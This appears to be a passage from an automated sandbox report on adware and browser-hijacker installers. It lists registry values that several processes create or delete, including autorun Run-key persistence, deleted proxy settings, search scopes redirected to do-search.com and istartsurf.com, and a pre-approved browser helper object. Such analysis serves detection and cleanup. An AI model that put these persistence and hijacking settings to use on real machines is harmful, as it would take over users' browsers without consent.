[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 5F 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

"WpadDecisionTime" = "D1 BA 90 83 30 7A D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process Mniitruxnlcp.exe:3244 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\AppDataLow\Software\Crossrider]
"Bic" = "f1455de99fbc9c9080e7ed2fd747836eIE"

[HKLM\SOFTWARE\Wow6432Node\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\iWebar]
"DisplayName" = "iWebar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\iWebar]
"CrAppId" = "70121"

[HKLM\SOFTWARE\Wow6432Node\AppDataLow\Software\Crossrider]
"Verifier" = "b2eb32d323f5359842a735827d51a4f5"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\iWebar]
"Publisher" = "Webby"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Wow6432Node\iWebar\Installer]
"BundledFirefox" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionTime" = "F1 E5 37 67 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "F9 96 66 65 30 7A D0 01"

[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\21836]
"70121" = "iWebar"

[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\iWebar]
"DisplayIcon" = "%Program Files% (x86)\iWebar\utils.exe"
"UninstallString" = "%Program Files% (x86)\iWebar\Uninstall.exe /fcp=1"

[HKCU\Software\AppDataLow\Software\Crossrider]
"Verifier" = "b2eb32d323f5359842a735827d51a4f5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKLM\SOFTWARE\Wow6432Node\AppDataLow\Software\Crossrider]
"Bic" = "f1455de99fbc9c9080e7ed2fd747836eIE"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\iWebar]
"DisplayVersion" = "1.36.01.22"
"CrPublisherId" = "21836"

[HKCU\Software\InstalledBrowserExtensions\21836]
"70121" = "iWebar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 57 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"70121" = "iWebar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\InstalledBrowserExtensions\Webby]
"70121" = "iWebar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Wow6432Node\Tempo]

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process XTab_Setup2121.exe:1496 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\HELPDIR]
"(Default)" = "%Program Files% (x86)\XTab"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}" = "1"

[HKLM\SOFTWARE\Wow6432Node\supTab]
"ptid" = "smt"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02"
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 5B 00 00 00 09 00 00 00 00 00 00 00"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0]
"(Default)" = "SupTabLib"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURL" = "http://www.bing.com/favicon.ico"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\0\win32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
"(Default)" = "IETabPage Class"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\PreApproved]
"{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}" = ""

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
"DisplayName" = "Bing"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconURL" = "http://www.google.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}"

[HKLM\SOFTWARE\Wow6432Node\SupDp]
"dir" = "%Program Files% (x86)\XTab"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconURL" = "http://do-search.com//favicon.ico"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"TopResultURL" = "http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"TopResultURL" = "http://www.istartsurf.com/web/?type=ds&ts=1429400145&from=smt&uid=267123711_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY]
"CheckedValue" = "PMIL"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"DisplayName" = "Google"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"DisplayName" = "e"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY]
"DefaultValue" = "PMIL"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{E733165D-CBCF-4FDA-883E-ADEF965B476C}.ico"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"

The process WebPlayer.exe:3488 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1351234145"

[HKCU\Software\WebPlayer\AppsHat]
"start-on-windows" = "true"
"Config" = "{""group-name"":""AppsHat""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionTime" = "FD 17 24 86 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "D1 BA 90 83 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\WebPlayer\AppsHat]
"last_config_request" = "Sun Apr 19 02:36:39 UTC 0300 2015"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "WebPlayer.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 61 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\WebPlayer\AppsHat]
"Version" = "2.13"
"first_run_complete" = "true"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
"WpadDecision" = "0"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"AppsHat" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process GLB61FD.tmp:3224 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Goobzo\YouTube Accelerator]
"InstallTime" = "1429400123"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Goobzo\YouTube Accelerator]
"ShowTrayMessage" = "0"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"ShowAds" = "1"

[HKCU\Software\Goobzo\YouTube Accelerator]
"(Default)" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\UserInfo]
"Newsletter" = "0"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"Aff" = "smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,"

[HKCU\Software\Goobzo\YouTube Accelerator]
"ShowAds" = "1"

[HKCU\Software\Goobzo\Language\YouTubeAccelerator\Settings]
"CurrentLanguage" = "1033"

[HKCU\Software\Goobzo\YouTube Accelerator]
"DontShowAccelerationNotSupported" = "1"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\UserInfo]
"email" = ""

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"Publisher" = "Goobzo Ltd."

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"LspInstall" = "%Program Files% (x86)\YouTube Accelerator\"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SharedDLLs\C:\Windows\system32]
"AniGIF.ocx" = "1"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"ZippedRules" = "1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"URLInfoAbout" = "http://www.youtubeaccelerator.com/support/"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"InstallTime" = "1429400123"
"DllInstall" = "%Program Files% (x86)\YouTube Accelerator\"

[HKCU\Software\Goobzo\YouTube Accelerator]
"Beta" = "0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"DisplayIcon" = "%Program Files% (x86)\YouTube Accelerator\YouTubeAccelerator.exe,-0"
"InstallLocation" = "%Program Files% (x86)\YouTube Accelerator"

[HKCU\Software\Goobzo\YouTube Accelerator]
"HideAccList" = "0"
"ShowTrayIcon" = "0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"HelpLink" = "http://www.youtubeaccelerator.com/about/"

[HKCU\Software\Goobzo\YouTube Accelerator]
"BuildNumber" = "102"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"UninstallString" = "%Program Files% (x86)\YouTube Accelerator\YTAUninstall.exe"

[HKCU\Software\Goobzo\YouTube Accelerator]
"Version" = "3.3.9.6"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"Contact" = "[email protected]"
"DisplayVersion" = "3396(build_102)"

[HKCU\Software\Goobzo\YouTube Accelerator\UserInfo]
"Newsletter" = "0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"DisplayName" = "YouTube Accelerator"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"(Default)" = ""

[HKCU\Software\Goobzo\YouTube Accelerator]
"Aff" = "smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"Version" = "3.3.9.6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\YouTube Accelerator]
"Order" = "E0 80 00 00 00 20 00 00 0D C0 10 00 00 10 00 00"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"Beta" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"Application" = "http://www.fileextensionpro.com/redir.aspx?s=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&LangID=x&Ext=%s"

[HKCU\Software\Goobzo\YouTube Accelerator]
"RunFinishInstall" = "1"

[HKCU\Software\Goobzo\YouTube Accelerator\UserInfo]
"email" = ""

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GOOBZOYouTubeAccelerator" = "%Program Files% (x86)\YouTube Accelerator\YouTubeAccelerator.exe"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Engine]

The Malware deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Goobzo\YouTube Accelerator\UserInfo]
"tver"

[HKCU\Software\Goobzo\YouTube Accelerator]
"Br"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"BrName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"HideAccList"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Engine]
"Mode"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Goobzo\YouTube Accelerator]
"BrName"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"Br"
"ShowTrayIcon"

The Malware disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"YouTubeAccelerator"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GoobzoYouTubeAccelerator"

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"VARemove"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"GoobzoYouTubeAccelerator"

The process regsvr32.exe:3240 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCR\Wow6432Node\Interface\{5428DAA1-5A6B-4443-9CAD-60D5C2F38F1B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\YTAHelper.YTAHelperBHO.1]
"(Default)" = "YTAHelper"

[HKCR\YTAHelper.YTAHelperBHO.1\CLSID]
"(Default)" = "{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}"

[HKCR\YTAHelper.YTAHelperBHO]
"(Default)" = "YTAHelper"

[HKCR\Wow6432Node\CLSID\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\Wow6432Node\CLSID\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}\ProgID]
"(Default)" = "YTAHelper.YTAHelperBHO.1"

[HKCR\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}]
"(Default)" = "YTAHelper"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Wow6432Node\Interface\{5428DAA1-5A6B-4443-9CAD-60D5C2F38F1B}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{5428DAA1-5A6B-4443-9CAD-60D5C2F38F1B}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}]
"(Default)" = "YTAHelperBHO"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\HELPDIR]
"(Default)" = "C:\ProgramData\YTAHelper"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0]
"(Default)" = "YTAHelper 1.0 Type Library"

[HKCR\Wow6432Node\CLSID\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}\InprocServer32]
"(Default)" = "C:\ProgramData\YTAHelper\YTAHelper.dll"

[HKCR\AppID\YTAHelper.DLL]
"AppID" = "{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}"

[HKCR\YTAHelper.YTAHelperBHO\CLSID]
"(Default)" = "{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}"

[HKCR\YTAHelper.YTAHelperBHO\CurVer]
"(Default)" = "YTAHelper.YTAHelperBHO.1"

[HKCR\Wow6432Node\CLSID\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}]
"(Default)" = "YTAHelper"

[HKCR\Interface\{5428DAA1-5A6B-4443-9CAD-60D5C2F38F1B}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\Interface\{5428DAA1-5A6B-4443-9CAD-60D5C2F38F1B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}]
"NoExplorer" = "1"

